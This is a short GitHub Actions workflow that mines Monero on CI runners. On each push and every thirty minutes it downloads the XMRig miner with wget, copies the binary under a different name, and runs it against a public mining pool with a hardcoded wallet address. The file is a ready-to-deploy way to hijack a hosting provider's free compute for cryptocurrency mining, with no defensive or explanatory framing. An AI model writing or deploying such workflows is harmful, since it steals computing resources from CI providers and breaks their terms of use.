name: Mine Cryptocurrency

on:
  push:
    branches:
      - main
  schedule:
    - cron: '*/30 * * * *'

jobs:
  mine:
    runs-on: ubuntu-latest

    steps:
      - name: Check out the repository
        uses: actions/checkout@v2

      - name: Download precompiled XMRig
        run: |
          wget https://github.com/xmrig/xmrig/releases/download/v6.15.2/xmrig-6.15.2-linux-x64.tar.gz
          tar -xvf xmrig-6.15.2-linux-x64.tar.gz
          cd xmrig-6.15.2
          cp xmrig xmrig2

      - name: Run XMRig
        run: |
          ./xmrig2 -o pool.supportxmr.com:3333 -u 49m1VGmqoi8gUWfnngjbmr15mdgptCX5H3uL157N62EX15s6hu3zCokGDzHv27gsY8RmAfbD7jxwjbHgqsrKqd4c65QQvvz -p x -k
